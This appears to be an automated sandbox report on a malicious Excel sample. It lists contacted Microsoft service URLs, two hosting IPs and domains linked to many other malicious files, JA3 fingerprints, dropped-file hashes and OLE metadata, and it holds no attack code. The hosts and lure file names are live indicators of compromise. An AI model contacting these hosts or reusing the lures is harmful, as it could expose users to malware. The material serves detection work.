                                                                                                                                      https://augloop.office.com/v2EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorizeEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.aiEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.185.39.58
                                                                                                                                                  signifysystem.comUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                  192.185.32.232
                                                                                                                                                  fcventasyservicios.clUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:412197
                                                                                                                                                  Start date:12.05.2021
                                                                                                                                                  Start time:13:43:19
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 2s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:32154f4c_by_Libranalysis.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:30
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal68.expl.evad.winXLS@5/6@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.185.39.5832154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                    9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          192.185.32.23232154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                                  Domains

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                  signifysystem.com9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  fcventasyservicios.cl32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232

                                                                                                                                                                  ASN

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                  UNIFIEDLAYER-AS-1US32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.232.222.43
                                                                                                                                                                  abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                  • 67.20.76.71
                                                                                                                                                                  Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.171.219
                                                                                                                                                                  DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.169.22
                                                                                                                                                                  dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.171.219
                                                                                                                                                                  RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.129.32
                                                                                                                                                                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.62.63
                                                                                                                                                                  in.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.244.112
                                                                                                                                                                  PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.144.13.239
                                                                                                                                                                  catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 108.167.180.164
                                                                                                                                                                  catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 108.167.180.164
                                                                                                                                                                  export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 108.179.232.90
                                                                                                                                                                  XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.190.216
                                                                                                                                                                  QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 108.179.232.90
                                                                                                                                                                  15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.115.105
                                                                                                                                                                  e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.190.216
                                                                                                                                                                  UNIFIEDLAYER-AS-1US32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.232.222.43
                                                                                                                                                                  abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                  • 67.20.76.71
                                                                                                                                                                  Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.171.219
                                                                                                                                                                  DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.169.22
                                                                                                                                                                  dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.171.219
                                                                                                                                                                  RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.129.32
                                                                                                                                                                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.62.63
                                                                                                                                                                  in.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.244.112
                                                                                                                                                                  PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.144.13.239
                                                                                                                                                                  catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 108.167.180.164
                                                                                                                                                                  catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 108.167.180.164
                                                                                                                                                                  export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 108.179.232.90
                                                                                                                                                                  XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.190.216
                                                                                                                                                                  QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 108.179.232.90
                                                                                                                                                                  15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.115.105
                                                                                                                                                                  e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 162.241.190.216

                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e199659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  catalog-949138716.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  - FAX ID 74172012198198.htmGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  #Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htmGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  Cotizacii#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  Cotizaci#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  statistic-1310760242.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  Payment Slip.docxGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                  Report000042.htmGet hashmaliciousBrowse
                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                  • 192.185.39.58

                                                                                                                                                                  Dropped Files

                                                                                                                                                                  No context

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\EFB6B18F-65BF-445D-97B5-07043DE10A60
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):134558
                                                                                                                                                                  Entropy (8bit):5.368389232876491
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:YcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:fEQ9DQW+zPXO8
                                                                                                                                                                  MD5:D69DCEA1DFE704A17B1DD5A3A7CFDD65
                                                                                                                                                                  SHA1:73C14C6B84E2A10ED5074C8A16FE2A78EE39DDEA
                                                                                                                                                                  SHA-256:73BBFA65CA933B4CCF0BA8E1239620CCA98132AB4DA520063B81137160C1494D
                                                                                                                                                                  SHA-512:886E8C380748E9F3E00C343148BBBAFCEA889E4DBAA5006183B7E4EE871FC43D4EC0F7C413B533844C3877C71603849CB9E2B22E7424D66164F71AE1313303BC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T11:46:39">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\61910000
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):81549
                                                                                                                                                                  Entropy (8bit):7.910425460774261
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:BWjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJP6S:E+nHSD8YZo/Uh0ZymYQ0y7FALYS
                                                                                                                                                                  MD5:336DFC557B7FE840B3DA2373DD83CBED
                                                                                                                                                                  SHA1:6752D5BA2939BF473C685580A15A28516F4B3337
                                                                                                                                                                  SHA-256:B98C928C780F7FE4DDC98ACBAE9721ADBB33E4862EC1C05E4E20C57E66CDE3F2
                                                                                                                                                                  SHA-512:963D08AEA2C5985B65FAB7B7AF236AC2B9716C51AAC3556D87B93803C52DBBF71913E9CF0C315421A9E255D2F4018F4DF2299217847D4BFCF036E92B255AAEBA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\32154f4c_by_Libranalysis.xls.LNK
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Wed May 12 19:46:42 2021, atime=Wed May 12 19:46:42 2021, length=177152, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2250
                                                                                                                                                                  Entropy (8bit):4.715091568512339
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:8viCYsxOEEw+fNIOEyse9B6pviCYsxOEEw+fNIOEyse9B6:8vBFAfNIFhwKvBFAfNIFhw
                                                                                                                                                                  MD5:3E216A0455C3F6FA81CDC92704C2FE53
                                                                                                                                                                  SHA1:4ED45B4510ED2EBCB0F7874C4201930DDF12D2AE
                                                                                                                                                                  SHA-256:E67ECAF8C67C26C95C1C20E552CBF8937A1A7B80B34A82E0A2AAD13AB0E8F222
                                                                                                                                                                  SHA-512:C9D37BB6D00C9DC6CE3FB8EBA60D9A767C1D43043AC3B17AAC9E9780ABB7F8D5224DF7707CF25BB79751BA0B33FB8F42A48E41F5C8408BC01964169CCDA655E2
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: L..................F.... ....t..:....6..oG...6..oG...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R......S.....................P..h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..R......Y..............>.......G.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R. .32154F~1.XLS..j......>Qvx.R.....h......................%..3.2.1.5.4.f.4.c._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\32154f4c_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3.2.1.5.4.f.4.c._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...As...`.......X.......910646...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed May 12 19:46:42 2021, atime=Wed May 12 19:46:42 2021, length=8192, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):904
                                                                                                                                                                  Entropy (8bit):4.665166724698819
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:8eXUruElPCH2Ae9SYlLi5+WrjAZ/2bDdLC5Lu4t2Y+xIBjKZm:8ue9vAAZiDM87aB6m
                                                                                                                                                                  MD5:5B7A138293F616DF485AF207EBB2113F
                                                                                                                                                                  SHA1:1838AF5F5BB900CBFF99DC5F56B6132EB6103235
                                                                                                                                                                  SHA-256:BE218CA787FE71B86A44C712E74438B748D0CC5F3FFC42FAB24CA78089D9CA9F
                                                                                                                                                                  SHA-512:A3D66D6264DA90EA6FAD066D61A95B7A8B802A89C6D4193DE4587F20945EF950988654CBACC45B03BF14D1B89D21CAE437B73C48D8BA088417ED97845852D422
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: L..................F........N....-..#...oG..#...oG... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R......S.....................P..h.a.r.d.z.....~.1......R...Desktop.h.......Ny..R......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......910646...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):137
                                                                                                                                                                  Entropy (8bit):4.791101722056727
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:oyBVomMOEQpHcPHUwSLMd1ZYHcPHUwSLMd1mMOEQpHcPHUwSLMd1v:dj6mHO0NGYHO0NamHO0NS
                                                                                                                                                                  MD5:768F71896AA98A93773A5ED2FE28117A
                                                                                                                                                                  SHA1:537653AF56FADF13C499E39D8D0E64BE73028D91
                                                                                                                                                                  SHA-256:55AE39EF8FBF76AFC3A02D25D1FDD24CB5F67C3622086E5508C86459EF6C46A6
                                                                                                                                                                  SHA-512:896D078BE600BDEDD3BD0DC5402493CDE4012ACCA178E8305F26AC679EB41618F465F95661ABE23DE781551DB506DF0CC91610F735D917C098BEFF13326EA662
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..32154f4c_by_Libranalysis.xls.LNK=0..32154f4c_by_Libranalysis.xls.LNK=0..[xls]..32154f4c_by_Libranalysis.xls.LNK=0..
                                                                                                                                                                  C:\Users\user\Desktop\62910000
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):228873
                                                                                                                                                                  Entropy (8bit):5.616610199130824
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:V7NiRdSD8YNoTU90u9fzn3bb0X7vrPlsrXvLlL7Lq7Niui:6RdTrTU9Zhrui
                                                                                                                                                                  MD5:A0BC603E67755B5EADEDF1721B3FBFB7
                                                                                                                                                                  SHA1:7A26AE4BA39CAE137274B39750740F2D80B78AF0
                                                                                                                                                                  SHA-256:4582C575606476A71CCE26B98F5A79B1FC6CCCB08BF2361E1D2DE35642A2DC77
                                                                                                                                                                  SHA-512:8E6F8D10B15F8597CC55510197B1AE3EADAA89EF8714E39A109624C11C8A7DD7493066259CD5DFDF395598D85EA48A1F946407054BDB0D43307CED004C370F81
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1................L..A.r.i.a.l.1................L..A.r.i.a.l.1.......>........L..A.r.i.a.l.1.......?........L..A.r.i.a.l.1................L..A.r.i.a.l.1................L..A.r.i.a.l.1................L..C.a.l.i.b.r.i.1................L..A.r.i.a.l.1................L..A.r.i.a.l.1................L..A.r.i.a.l.1...............

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                                  Entropy (8bit):3.258986427712615
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                  File name:32154f4c_by_Libranalysis.xls
                                                                                                                                                                  File size:375808
                                                                                                                                                                  MD5:32154f4c3997c4c3d695bf52704e5302
                                                                                                                                                                  SHA1:4e47b10ce837d78b31bbcf5b37622488a8c436c9
                                                                                                                                                                  SHA256:c92b6793b9457a9f0909c33a41f04a6d34389dce626d5eabcec7a2384270f53b
                                                                                                                                                                  SHA512:b73f732e45c2f49f4153209c97e84fb49b3a3367b2ca68e327c13f450daecefca885e59966ef25cfc3558c36a9f0257ffc9c0ce0aa111a69a7d068eace273790
                                                                                                                                                                  SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc5:vUGAt6Uqa5DPdG9uS9QLp4l+s+E8
                                                                                                                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                  Static OLE Info

                                                                                                                                                                  General

                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                  Number of OLE Files:1

